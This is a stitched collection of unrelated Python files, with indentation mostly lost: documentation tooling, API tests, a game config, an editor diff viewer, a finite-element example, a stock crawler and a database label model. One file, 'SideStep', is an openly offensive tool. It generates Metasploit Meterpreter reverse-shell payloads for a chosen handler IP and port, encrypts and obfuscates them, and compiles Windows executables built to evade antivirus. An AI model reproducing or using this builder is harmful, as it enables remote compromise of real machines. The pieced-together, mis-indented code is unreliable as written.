index_file = path.abspath('../{}'.format(path.basename(index_path)))
reformatted_headers_dir = path.join(temp_dir, 'reformatted_headers')
convert_tomdoc(src_dir, reformatted_headers_dir, header_translator, generator)
src_dir = reformatted_headers_dir
docset_feed_url = 'http://www.madeupname.com/docsets/'
if generator == OutputGenerator.appledoc:
"""
Appledoc
"""
print("Generating appledoc in",temp_dir)
# As of 31 August, 2013, these extra flags to appledoc are only supported in the version of
# appledoc available here: https://github.com/antmd/appledoc:
# --ignore-symbol <glob>
# --require-leader-for-local-crossrefs
# A pull request to the parent repository has been made
appledoc_extra_flags=[]
        # subprocess.check_call raises when grep finds nothing, so use
        # subprocess.call and test for a zero exit status instead.
        if subprocess.call("{} --help | grep 'ignore-symbol' >/dev/null".format(appledoc_binary), shell=True) == 0:
            appledoc_extra_flags += ['--ignore-symbol', '*Deprecated*']
        if subprocess.call('{} --help | grep "require-leader-for-local-crossrefs" >/dev/null'.format(appledoc_binary), shell=True) == 0:
            appledoc_extra_flags += ['--require-leader-for-local-crossrefs']
appledoc_standard_options = [
'--project-name', docset_name,
'--project-company', company_name,
'--company-id', company_id,
'--docset-atom-filename', '{}.atom'.format(docset_name),
'--docset-feed-url', '{}/%DOCSETATOMFILENAME'.format(docset_feed_url),
'--docset-package-url', '{}/%DOCSETPACKAGEFILENAME'.format(docset_feed_url),
'--docset-fallback-url', docset_feed_url,
'--docset-bundle-filename', '.'.join([docset_id,'docset']),
'--output', output_dir,
'--logformat', 'xcode' ,
'--ignore', '*.m' ,
'--ignore', '*Deprecated*' ,
'--verbose', str(verbosity),
'--keep-undocumented-objects',
'--keep-undocumented-members',
'--keep-intermediate-files',
'--no-repeat-first-par',
'--no-warn-invalid-crossref',
'--install-docset'
]
if index_file:
appledoc_standard_options += ['--index-desc', index_file]
appledoc_cmd = [appledoc_binary] + appledoc_standard_options + appledoc_extra_flags + [src_dir]
#print("Running : {}".format(' '.join(appledoc_cmd)))
try:
subprocess.check_call(appledoc_cmd)
except subprocess.CalledProcessError as ex:
"""
print('Appledoc failed to generate the documentation')
return False
"""
# Looks like Appledoc returns non-zero code, even if successful
pass
elif generator == OutputGenerator.doxygen:
"""
Doxygen
"""
print("Generating doxygen in",temp_dir)
if dot_path:
if not path.exists(dot_path):
print("Cannot find dot at {}".format(dot_path), file=sys.stderr)
exit(1)
else:
dot_path = which('dot')
if not dot_path:
print("Cannot find dot on PATH. Will not generate diagrams")
if dot_path:
putenv('DOT_PATH', dot_path)
putenv('HAVE_DOT', 'YES')
else:
putenv('HAVE_DOT', 'NO')
putenv('INPUT_DIR', '"{}"'.format(src_dir))
putenv('HTML_HEADER','')
putenv('DOCSET_PUBLISHER_ID', company_id)
putenv('DOCSET_PUBLISHER', company_name)
putenv('DOCSET_BUNDLE_ID', docset_id)
putenv('FRAMEWORK', docset_name)
putenv('OUTPUT_DIRECTORY', output_dir)
putenv('SOURCE_BROWSER', source_browser_yn)
"""
TODO
# Generate the index page
pushd "${GeneratedHeadersDir}" >/dev/null 2>&1
cat > mainpage.h <<-EOF
/*! \\mainpage ${FRAMEWORK} Main Page
*
EOF
if [[ ! -z "$INDEX_FILE" ]]; then
cat < "../${INDEX_FILE}" >> mainpage.h
fi
cat >> mainpage.h <<-EOF
*/
EOF
popd >/dev/null 2>&1
"""
try:
subprocess.check_call([doxygen_binary, path.join(doxygen_templates_dir, doxygen_template)])
subprocess.check_call("cd {} && make install".format(output_dir), shell=True)
except subprocess.CalledProcessError as e:
            print("Doxygen failed with error: {}".format(e), file=sys.stderr)
return False
return True
# Clean-up temporary directory
#shutil.rmtree(temp_dir)
def parse_args(doxygen_templates):
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('srcdir', help='Directory containing the source header files', default = '.')
arg_parser.add_argument('-o', '--output', help='Directory for the generated docs', nargs='?')
arg_parser.add_argument('-i', '--index', help='Path to the index page', required=False)
arg_parser.add_argument('-n', '--name', help='The name of the docset (appears on the doc pages)', required=True)
arg_parser.add_argument('-c', '--company', help='The name of the company owning the source', required=False)
arg_parser.add_argument('-d', '--company-id', help='The id of the company in reverse-DNS style', required=False)
arg_parser.add_argument('-t', '--tomdoc', help='Turn on TomDoc conversion of input files', action='store_true')
arg_parser.add_argument('-x', '--translate', help='Simple conversion of non-doc comments to doc-comments', action='store_true')
arg_parser.add_argument('-g', '--generator', help='The output generator', choices=['appledoc', 'doxygen'], default='appledoc')
doxygen_group = arg_parser.add_argument_group('doxygen-only arguments', 'Options to customise doxygen output')
doxygen_group.add_argument('-f', '--format', help='Output format', choices=['docset', 'html'], default='docset', required=False)
doxygen_group.add_argument('-s', '--source', help='Include source browser', action='store_true', required=False)
doxygen_group.add_argument('-l', '--language', help='Force the language', choices=['c++', 'objc', 'all'], default='all', required=False)
doxygen_group.add_argument('--dot-path', help='The path to "dot" for doxygen. Default is binary found on PATH.', required=False)
args = arg_parser.parse_args()
return args
def get_doxygen_templates(template_dir):
return [path.splitext(t)[0] for t in listdir(path.abspath(template_dir))]
if __name__ == '__main__':
doxygen_templates_dir = path.join(script_path,'doxygen-templates')
doxygen_templates = get_doxygen_templates(doxygen_templates_dir)
args = parse_args(doxygen_templates)
result = generate_docs(doxygen_templates_dir, args)
if result:
print("Docset was successfully generated and installed!")
|
"""Tests for `otelib.strategies.dataresource`."""
from typing import TYPE_CHECKING
import pytest
if TYPE_CHECKING:
from typing import Callable, Union
from tests.conftest import OTEResponse, ResourceType
def test_create(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
) -> None:
"""Test `DataResource.create()`."""
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
data_resource = DataResource(server_url)
assert data_resource.id is None
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
assert data_resource.id
def test_create_fails(
mock_ote_response: "OTEResponse",
server_url: str,
) -> None:
"""Check `DataResource.create()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
status_code=500,
return_content=b"Internal Server Error",
)
data_resource = DataResource(server_url)
assert data_resource.id is None
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
session_id=123,
)
assert data_resource.id is None
def test_fetch(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Test `DataResource.fetch()`."""
import json
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
mock_ote_response(
method="get",
endpoint=f"/dataresource/{ids('dataresource')}",
return_json=testdata("dataresource"),
)
data_resource = DataResource(server_url)
# We must first create the resource - getting a resource ID
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
content = data_resource.fetch(session_id=None)
assert json.loads(content) == testdata("dataresource")
def test_fetch_fails(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
) -> None:
"""Check `DataResource.fetch()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
mock_ote_response(
method="get",
endpoint=f"/dataresource/{ids('dataresource')}",
status_code=500,
return_content=b"Internal Server Error",
)
data_resource = DataResource(server_url)
# We must first create the resource - getting a resource ID
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
data_resource.fetch(session_id=123)
def test_initialize(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
) -> None:
    """Test `DataResource.initialize()`."""
import json
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
mock_ote_response(
method="post",
endpoint=f"/dataresource/{ids('dataresource')}/initialize",
return_json={},
)
data_resource = DataResource(server_url)
# We must first create the resource - getting a resource ID
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
content = data_resource.initialize(session_id=None)
assert json.loads(content) == {}
def test_initialize_fails(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
) -> None:
    """Check `DataResource.initialize()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
mock_ote_response(
method="post",
endpoint=f"/dataresource/{ids('dataresource')}/initialize",
status_code=500,
return_content=b"Internal Server Error",
)
data_resource = DataResource(server_url)
# We must first create the resource - getting a resource ID
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
data_resource.initialize(session_id=123)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Wed Jan 24 22:53:14 2018
# (c) Alexander Veledzimovich
"""
Setting for 0_spacewar.py
"""
__version__ = 0.1
class Setting():
"""
Constants
"""
def __init__(self):
self.FPS = 30
self.WID = 1024
self.HEI = 768
self.SCRWID = self.WID // 2
self.SCRHEI = self.HEI // 2
self.DIST = 30
self.SCRRADIUS = self.SCRHEI - self.DIST
self.SCRBORDERSIZE = 20
self.BLACKBLUE = (0, 0, 35, 255)
self.GRAY = (128, 128, 128, 128)
self.WHITE = (255, 240, 240)
self.DARKCYAN = (0, 130, 155, 255)
self.LIGHTCYAN = (50, 110, 160, 255)
self.EMPTY = (255, 255, 255, 0)
self.APPNAME = 'Spacewar!'
self.TITLEFNT = ('fonts/pdp1.ttf', 80)
self.LABFNT = ('fonts/pdp1.ttf', 20)
self.BGCLR = self.BLACKBLUE
self.TXTCLR = self.DARKCYAN
self.GAMECLR = self.DARKCYAN
self.PDPCLR = self.LIGHTCYAN
self.FINALPAUSE = self.FPS * 3
self.SHIPPOS = {'needle': (self.SCRWID - self.SCRRADIUS + self.DIST,
self.SCRHEI),
'wedge': (self.SCRWID + self.SCRRADIUS - self.DIST,
self.SCRHEI)}
self.INITANGLE = {'needle': 1, 'wedge': 179, 'asteroid': 1}
self.FUEL = 256
self.SPEED_DT = 0.2
self.ROTATE_DT = 0.1
self.MAXSPEED = 6
self.MAXROTSPEED = 3
self.HYPERJUMP = 3
self.SHIPBOOM = 64
self.NUMTORPEDOS = 9
self.TORPEDASPEED = 0.6
self.TORPEDAMAXSPEED = 10
self.TORPEDADIST = 80
self.SUNRAD = 32
self.SUNGRAV = 0.0008
self.SUNGRAVRAD = 256
self.SUNDT = 1
self.STARS = 64
self.STARCLR = self.GRAY
self.STARSIZE = [2, 4]
self.INITASTER = 48
self.TIMETOBORN = 14
self.ASTDT = (-3, 4)
self.ASTSIZE = [4, 6, 8, 10, 12, 16, 18]
self.ASTMAKE = 16
self.ASTBOOM = 24
self.DOTSDT = (-1, 2)
def init_dynamic_settings(self):
pass
def reset_dynamic_settings(self):
pass
if __name__ == '__main__':
print(__version__)
print(__doc__)
print(__file__)
|
import difflib
import kaa
from kaa import document
from kaa.filetype.diff import diffmode
from kaa.filetype.default import keybind
from kaa.ui.dialog import dialogmode
class ViewDiffMode(dialogmode.DialogMode):
MODENAME = 'ViewDiff'
DOCUMENT_MODE = False
USE_UNDO = False
KEY_BINDS = [
keybind.cursor_keys,
keybind.edit_command_keys,
keybind.emacs_keys,
keybind.macro_command_keys,
]
tokenizer = diffmode.make_tokenizer()
callback = None
def init_keybind(self):
super().init_keybind()
self.register_keys(self.keybind, self.KEY_BINDS)
def init_themes(self):
super().init_themes()
self.themes.append(diffmode.DiffThemes)
    def is_cursor_visible(self):
        return 0   # hide cursor
def on_str(self, wnd, s, overwrite=False):
# does nothing
pass
def on_esc_pressed(self, wnd, event):
popup = wnd.get_label('popup')
if popup:
popup.destroy()
kaa.app.messagebar.set_message("")
if self.callback:
self.callback()
def view_doc_diff(curdoc, callback=None):
orig = kaa.app.storage.openfile(
curdoc.fileinfo.fullpathname,
curdoc.fileinfo.encoding,
curdoc.fileinfo.newline,
nohist=True)
org_lines = list(orig.iterlines(0))
orig.close()
cur_lines = list(curdoc.iterlines(0))
diff = ''.join(difflib.unified_diff(org_lines, cur_lines,
curdoc.fileinfo.fullpathname, '(buffer)'))
doc = document.Document()
doc.insert(0, diff)
mode = ViewDiffMode()
mode.callback = callback
doc.setmode(mode)
kaa.app.show_dialog(doc)
def show_diff(diff):
doc = document.Document()
doc.insert(0, diff)
mode = ViewDiffMode()
doc.setmode(mode)
kaa.app.show_dialog(doc)
|
"""
Name: SideStep
Version: 0.1.0
Date: 3/30/2015
Author: Josh Berry - josh.berry@codewatch.org
Github: https://github.com/codewatchorg/sidestep
Description: SideStep is yet another tool to bypass anti-virus software. The tool generates Metasploit payloads encrypted using the CryptoPP library (license included), and uses several other techniques to evade AV.
Software Requirements:
Metasploit Community 4.11.1 - Update 2015031001 (or later)
Ruby 2.x
Windows (7 or 8 should work)
Python 2.7.x
Visual Studio (free editions should be fine)
Cygwin with strip utility (if you want to strip debug symbols)
Configuration Requirements:
Ruby, Python, strip.exe (if using it), and the cl.exe tool from Visual Studio need to be in your path. Sorry, I tried to make it compile with mingw-gcc with no luck.
I leveraged ideas from the following projects to help develop this tool:
- https://github.com/nccgroup/metasploitavevasion
- https://github.com/inquisb/shellcodeexec
"""
import argparse
import sys
import string
import subprocess
import os
import time
import re
from libs import rng
from libs import encryption
from libs import msfpayload
from libs import codesegments
def main(argv):
# Build argument list for running the script
parser = argparse.ArgumentParser(prog='sidestep.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Generate an executable to bypass DEP and AV protections',
epilog='Example: sidestep.py --file file.c --exe file.exe')
parser.add_argument('--file',
default='sidestep.cpp',
help='the file name in which the C code is placed')
parser.add_argument('--exe',
default='sidestep.exe',
help='the name of the final executable')
parser.add_argument('--ip',
required=True,
help='the IP on which the Metasploit handler is listening')
parser.add_argument('--port',
required=True,
help='the port on which the Metasploit handler is listening')
parser.set_defaults(file='sidestep.cpp', exe='sidestep.exe')
# Hold argument values in args
args = vars(parser.parse_args())
path_delim = ''
if 'posix' in os.name:
path_delim = '/'
else:
path_delim = '\\'
# Load configuration options
sys.path.append(os.getcwd() + path_delim + 'conf' + path_delim)
import settings
ip = args['ip']
port = args['port']
clOptions = '/GS /GL /analyze- /Zc:wchar_t /Zi /Gm /O2 /sdl /fp:precise /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oy- /Oi /MT /EHsc /Fe"' + settings.exeDir + path_delim + args['exe'] + '" /Fo"' + settings.exeDir + path_delim + args['exe'].split('.')[0] + '.obj " /Fd"' + settings.exeDir + path_delim + args['exe'].split('.')[0] + '" /nologo /I"' + settings.vsPath + path_delim + 'include" /I"' + settings.vsPath + path_delim + 'atlmfc' + path_delim + 'include" /I"' + settings.sdkPath + path_delim + 'Include" "' + settings.sdkPath + path_delim + 'Lib' + path_delim + 'AdvAPI32.Lib" "' + settings.sdkPath + path_delim + 'Lib' + path_delim + 'Uuid.Lib" "' + settings.sdkPath + path_delim + 'Lib' + path_delim + 'Kernel32.Lib" ' + settings.cryptLibPath + ' ' + settings.sourceDir + path_delim + args['file']
print '[+] Preparing to create a Meterpreter executable'
# Set the command line values
sourceFile = open(settings.sourceDir + path_delim + args['file'], 'w')
# Set DH parameter size
dhLen = 1024
if settings.dhSize == 2:
dhLen = 2048
execFuncVar = rng.genFunc(settings.randomFuncSize)
execParamVar = rng.genVar(settings.randomVarSize)
aesPayloadVar = rng.genVar(settings.randomVarSize)
virtAllocFuncVar = rng.genFunc(settings.randomFuncSize)
virtAllocFuncParam = rng.genVar(settings.randomVarSize)
encKey = rng.genKey(settings.encKeyLen)
encIv = rng.genIv(settings.encIvLen)
heuristicFuncVar = rng.genFunc(settings.randomFuncSize)
diffieFuncVar = rng.genFunc(settings.randomFuncSize)
diffieDh = rng.genVar(settings.randomVarSize)
diffieRnd = rng.genVar(settings.randomVarSize)
diffieBits = rng.genVar(settings.randomVarSize)
diffieCount = rng.genVar(settings.randomVarSize)
diffieP = rng.genVar(settings.randomVarSize)
diffieQ = rng.genVar(settings.randomVarSize)
diffieG = rng.genVar(settings.randomVarSize)
diffieV = rng.genVar(settings.randomVarSize)
diffieE = rng.genVar(settings.randomVarSize)
diffieMsg1 = rng.genData(settings.dataLen)
diffieMsg2 = rng.genData(settings.dataLen)
curTimeVar = rng.genVar(settings.randomVarSize)
print '[-]\tGenerating the Meterpreter shellcode'
clearPayload = msfpayload.payloadGenerator(settings.msfpath, settings.msfvenom, settings.msfmeterpreter, ip, port)
print '[-]\tEncrypting Meterpreter executable'
encPayload = encryption.aesCbc(settings.encKeyLen, settings.encIvLen, encKey, encIv, clearPayload)
# int main() vars
mainSt = rng.genVar(settings.randomVarSize)
mainDecrypted = rng.genVar(settings.randomVarSize)
mainEncodeKey = rng.genVar(settings.randomVarSize)
mainEncodeIv = rng.genVar(settings.randomVarSize)
mainDecodeCipher = rng.genVar(settings.randomVarSize)
mainFuncPayload = rng.genFunc(settings.randomFuncSize)
mainAesDecryption = rng.genVar(settings.randomVarSize)
mainCbcDecryption = rng.genVar(settings.randomVarSize)
mainStfDecryptor = rng.genVar(settings.randomVarSize)
# virtual allocation function for writing shellcode to memory and executing
virtAllocLen = rng.genVar(settings.randomVarSize)
virtAllocPid = rng.genVar(settings.randomVarSize)
virtAllocCode = rng.genVar(settings.randomVarSize)
virtAllocAddr = rng.genVar(settings.randomVarSize)
virtAllocPage_size = rng.genVar(settings.randomVarSize)
print '[-]\tGenerating the source code for the executable'
src = codesegments.cHeaders() + "\n"
src += codesegments.execHeaderStub(execFuncVar, execParamVar) + "\n"
src += "USING_NAMESPACE(CryptoPP)\n"
src += codesegments.randVarsAndData(settings.paddingVars, lambda: rng.genVar(settings.randomVarSize), lambda: rng.genData(settings.dataLen)) + "\n"
src += "std::string " + aesPayloadVar + " = \"" + encPayload + "\";\n"
src += "int " + virtAllocFuncVar + "(std::string " + virtAllocFuncParam + ");\n"
src += codesegments.delayTime(heuristicFuncVar, settings.heuristicTimerVar, settings.diffieDelay, diffieFuncVar, curTimeVar, diffieDh, dhLen, diffieRnd, diffieBits, diffieCount, diffieP, diffieQ, diffieG, diffieV, diffieE, diffieMsg1, diffieMsg2) + "\n"
src += codesegments.mainStub(mainSt, heuristicFuncVar, mainDecrypted, mainEncodeKey, encKey, mainEncodeIv, encIv, mainDecodeCipher, mainFuncPayload, aesPayloadVar, mainAesDecryption, mainCbcDecryption, mainStfDecryptor, virtAllocFuncVar) + "\n"
src += codesegments.virtualAllocStub(virtAllocFuncVar, virtAllocFuncParam, virtAllocLen, virtAllocPid, virtAllocCode, virtAllocAddr, virtAllocPage_size, execFuncVar, execParamVar) + "\n"
print '[-]\tWriting the source code to ' + settings.sourceDir + path_delim + args['file']
sourceFile.write(src)
sourceFile.close()
print '[-]\tCompiling the executable to ' + settings.exeDir + path_delim + args['exe']
subprocess.Popen('cl ' + clOptions, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
time.sleep(30)
if settings.useStrip == 1:
print '[-]\tStripping debugging symbols'
subprocess.Popen('strip.exe -s ' + settings.exeDir + path_delim + args['exe'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
time.sleep(5)
if settings.usePeCloak == 1:
print '[-]\tEncoding the PE file with peCloak'
subprocess.Popen('python ' + settings.peCloakPath + 'peCloak.py ' + os.getcwd() + path_delim + settings.exeDir + path_delim + args['exe'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
time.sleep(60)
os.remove(os.getcwd() + path_delim + settings.exeDir + path_delim + args['exe'])
for file in os.listdir(os.getcwd() + path_delim + settings.exeDir + path_delim):
if re.search('cloaked', file):
os.rename(os.getcwd() + path_delim + settings.exeDir + path_delim + file, os.getcwd() + path_delim + settings.exeDir + path_delim + args['exe'])
if __name__ == '__main__':
main(sys.argv[1:])
|
r"""
Laplace equation with Dirichlet boundary conditions given by a sine function
and constants.
Find :math:`t` such that:
.. math::
\int_{\Omega} c \nabla s \cdot \nabla t
= 0
\;, \quad \forall s \;.
The :class:`sfepy.discrete.fem.meshio.UserMeshIO` class is used to refine the
original two-element mesh before the actual solution.
The FE polynomial basis and the approximation order can be chosen on the
command-line. By default, the fifth order Lagrange polynomial space is used,
see ``define()`` arguments.
This example demonstrates how to visualize higher order approximations of the
continuous solution. The adaptive linearization is applied in order to save
viewable results, see both the options keyword and the ``post_process()``
function that computes the solution gradient. The linearization parameters can
also be specified on the command line.
The Lagrange or Bernstein polynomial bases support higher order
DOFs in the Dirichlet boundary conditions, unlike the hierarchical Lobatto
basis implementation, compare the results of::
python simple.py examples/diffusion/sinbc.py -d basis=lagrange
python simple.py examples/diffusion/sinbc.py -d basis=bernstein
python simple.py examples/diffusion/sinbc.py -d basis=lobatto
Use the following commands to view each of the results of the above commands
(assuming default output directory and names)::
python postproc.py -b -d't,plot_warp_scalar,rel_scaling=1' 2_4_2_refined_t.vtk --wireframe
python postproc.py -b 2_4_2_refined_grad.vtk
"""
from __future__ import absolute_import
import numpy as nm
from sfepy import data_dir
from sfepy.base.base import output
from sfepy.discrete.fem import Mesh, FEDomain
from sfepy.discrete.fem.meshio import UserMeshIO, MeshIO
from sfepy.homogenization.utils import define_box_regions
from six.moves import range
base_mesh = data_dir + '/meshes/elements/2_4_2.mesh'
def mesh_hook(mesh, mode):
"""
Load and refine a mesh here.
"""
if mode == 'read':
mesh = Mesh.from_file(base_mesh)
domain = FEDomain(mesh.name, mesh)
for ii in range(3):
output('refine %d...' % ii)
domain = domain.refine()
output('... %d nodes %d elements'
% (domain.shape.n_nod, domain.shape.n_el))
domain.mesh.name = '2_4_2_refined'
return domain.mesh
elif mode == 'write':
pass
def post_process(out, pb, state, extend=False):
"""
Calculate gradient of the solution.
"""
from sfepy.discrete.fem.fields_base import create_expression_output
aux = create_expression_output('ev_grad.ie.Elements( t )',
'grad', 'temperature',
pb.fields, pb.get_materials(),
pb.get_variables(), functions=pb.functions,
mode='qp', verbose=False,
min_level=0, max_level=5, eps=1e-3)
out.update(aux)
return out
def define(order=5, basis='lagrange', min_level=0, max_level=5, eps=1e-3):
filename_mesh = UserMeshIO(mesh_hook)
# Get the mesh bounding box.
io = MeshIO.any_from_filename(base_mesh)
bbox, dim = io.read_bounding_box(ret_dim=True)
options = {
'nls' : 'newton',
'ls' : 'ls',
'post_process_hook' : 'post_process',
'linearization' : {
'kind' : 'adaptive',
'min_level' : min_level, # Min. refinement level applied everywhere.
'max_level' : max_level, # Max. refinement level.
'eps' : eps, # Relative error tolerance.
},
}
materials = {
'coef' : ({'val' : 1.0},),
}
regions = {
'Omega' : 'all',
}
regions.update(define_box_regions(dim, bbox[0], bbox[1], 1e-5))
fields = {
'temperature' : ('real', 1, 'Omega', order, 'H1', basis),
}
variables = {
't' : ('unknown field', 'temperature', 0),
's' : ('test field', 'temperature', 't'),
}
amplitude = 1.0
def ebc_sin(ts, coor, **kwargs):
x0 = 0.5 * (coor[:, 1].min() + coor[:, 1].max())
val = amplitude * nm.sin( (coor[:, 1] - x0) * 2. * nm.pi )
return val
ebcs = {
't1' : ('Left', {'t.0' : 'ebc_sin'}),
't2' : ('Right', {'t.0' : -0.5}),
't3' : ('Top', {'t.0' : 1.0}),
}
functions = {
'ebc_sin' : (ebc_sin,),
}
equations = {
'Temperature' : """dw_laplace.10.Omega(coef.val, s, t) = 0"""
}
solvers = {
'ls' : ('ls.scipy_direct', {}),
'newton' : ('nls.newton', {
'i_max' : 1,
'eps_a' : 1e-10,
}),
}
return locals()
|
# eastmoney stock crawler
# tools browser Developer Tools
import requests
def getHTMLText(url,headers):
try:
r = requests.get(url,headers=headers,timeout=30)
r.raise_for_status()
r.encoding = r.apparent_encoding
return r.json()
    except (requests.RequestException, ValueError):
        # On failure, return an empty list so the caller's loop simply skips.
        return []
if __name__ == "__main__":
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36 Edg/83.0.461.1'
}
url = 'http://dcfm.eastmoney.com/em_mutisvcexpandinterface/api/js/get?type=QGQP_LB&token=70f12f2f4f091e459a279469fe49eca5'
html = getHTMLText(url,headers)
print(type(html))
result_list=[]
for data_dict in html:
temp={}
temp['Code']=data_dict['Code']
temp['Name']=data_dict['Name']
temp['JGCYDType']=data_dict['JGCYDType']
temp['ChangePercent']=data_dict['ChangePercent']
result_list.append(temp)
print (result_list)
|
# ----------------------------------------------------------------------
# RegexLabel model
# ----------------------------------------------------------------------
# Copyright (C) 2007-2021 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
from typing import Optional, List, Iterable
from threading import Lock
import re
import logging
import operator
# Third-party modules
from mongoengine.document import Document
from mongoengine.fields import StringField, BooleanField, ListField
from pymongo import UpdateMany
import cachetools
# from bson.regex import Regex
# NOC modules
from noc.core.model.decorator import on_save, on_delete
from noc.main.models.label import Label
id_lock = Lock()
re_lock = Lock()
logger = logging.getLogger(__name__)
@on_save
@on_delete
@Label.match_labels(category="rxfilter", allowed_op={"="})
class RegexpLabel(Document):
meta = {
"collection": "regexlabels",
"strict": False,
"auto_create_index": False,
}
name = StringField(unique=True)
description = StringField()
# Regular Expresion
regexp = StringField(required=True)
regexp_compiled = StringField(required=False)
# Set Multiline flag
flag_multiline = BooleanField(default=False)
# Set DotAll flag
flag_dotall = BooleanField(default=False)
# Set labels if match regex
labels = ListField(StringField())
# Allow apply for ManagedObject
enable_managedobject_name = BooleanField(default=False)
enable_managedobject_address = BooleanField(default=False)
enable_managedobject_description = BooleanField(default=False)
# Allow apply for Interface
enable_interface_name = BooleanField(default=False)
enable_interface_description = BooleanField(default=False)
# Allow apply for Interface
enable_sensor_local_id = BooleanField(default=False)
# Caches
_name_cache = cachetools.TTLCache(maxsize=1000, ttl=60)
_re_cache = {}
@classmethod
@cachetools.cachedmethod(operator.attrgetter("_name_cache"), lock=lambda _: id_lock)
def get_by_name(cls, name: str) -> Optional["Label"]:
return Label.objects.filter(name=name).first()
@cachetools.cachedmethod(operator.attrgetter("_re_cache"), lock=lambda _: re_lock)
    def _get_re(self, pattern: str) -> Optional[re.Pattern]:
        # Flags must be passed to re.compile(); a compiled pattern's flags are read-only.
        flags = 0
        if self.flag_multiline:
            flags |= re.MULTILINE
        if self.flag_dotall:
            flags |= re.DOTALL
        try:
            return re.compile(pattern, flags)
        except re.error:
            return None
@classmethod
def get_effective_labels(cls, scope: str, value: str) -> List[str]:
"""
:param: scope - check `enable_<scope>` for filter enable regex
:param: value - string value for check
"""
labels = []
for rx in RegexpLabel.objects.filter(**{f"enable_{scope}": True}):
            compiled = rx._get_re(rx.regexp)
            if compiled and compiled.match(value):
labels += [f"noc::rxfilter::{rx.name}::="] + (rx.labels or [])
return labels
# def clean(self):
# rx = Regex.from_native(self.regexp)
# rx.flags ^= re.UNICODE
# self.regexp_compiled = rx
def iter_models_fields(self) -> Iterable[str]:
"""
Yields all scopes
:return:
"""
if self.enable_managedobject_name:
yield "sa.ManagedObject", "name"
if self.enable_managedobject_address:
yield "sa.ManagedObject", "address"
if self.enable_managedobject_description:
yield "sa.ManagedObject", "description"
if self.enable_interface_name:
yield "inv.Interface", "name"
if self.enable_interface_description:
yield "inv.Interface", "description"
if self.enable_sensor_local_id:
yield "inv.Sensor", "local_id"
# def get_labels(self, scope: str = None) -> List[str]:
# r = self.labels or []
# for scp in self.iter_scopes():
# if (scope and scp != scope) or not getattr(self, f"enable_{scp}", False):
# continue
# r += [f"noc::rxfilter::{self.name}::{scp}::="]
# return r
def on_save(self):
"""
Sync field changes to model
For scope change:
* Remove label from model
For Regex change:
* Update labels set for regex
For labels change:
* Sync label for change
:return:
"""
if not hasattr(self, "_changed_fields"):
return
# print(self._old_values)
# Refresh regex
if (
"regexp" in self._changed_fields
or "flag_multiline" in self._changed_fields
or "flag_dotall" in self._changed_fields
):
logger.info("[%s] Regex field change. Refresh labels", self.name)
self._reset_caches()
self._refresh_labels()
def _refresh_labels(self):
"""
Recalculate labels on model
:return:
"""
from django.db import connection
from noc.models import get_model, is_document
labels = [f"noc::rxfilter::{self.name}::="] + (self.labels or [])
for model_id, field in self.iter_models_fields():
model = get_model(model_id)
if is_document(model):
# Cleanup current labels
logger.info("[%s] Cleanup Interface effective labels: %s", self.name, labels)
Label.reset_model_labels(model_id, labels)
# Apply new rule
coll = model._get_collection()
coll.bulk_write(
[
UpdateMany(
{field: {"$regex": self.regexp}},
{"$addToSet": {"effective_labels": {"$each": labels}}},
)
]
)
else:
# Cleanup current labels
logger.info("[%s] Cleanup ManagedObject effective labels: %s", self.name, labels)
Label.reset_model_labels(model_id, labels)
# Apply new rule
logger.info("[%s] Apply new regex '%s' labels", self.name, self.regexp)
sql = f"""
UPDATE {model._meta.db_table}
SET effective_labels=ARRAY (
SELECT DISTINCT e FROM unnest(effective_labels || %s::varchar[]) AS a(e)
)
WHERE {field} ~ %s
"""
cursor = connection.cursor()
cursor.execute(sql, [labels, self.regexp])
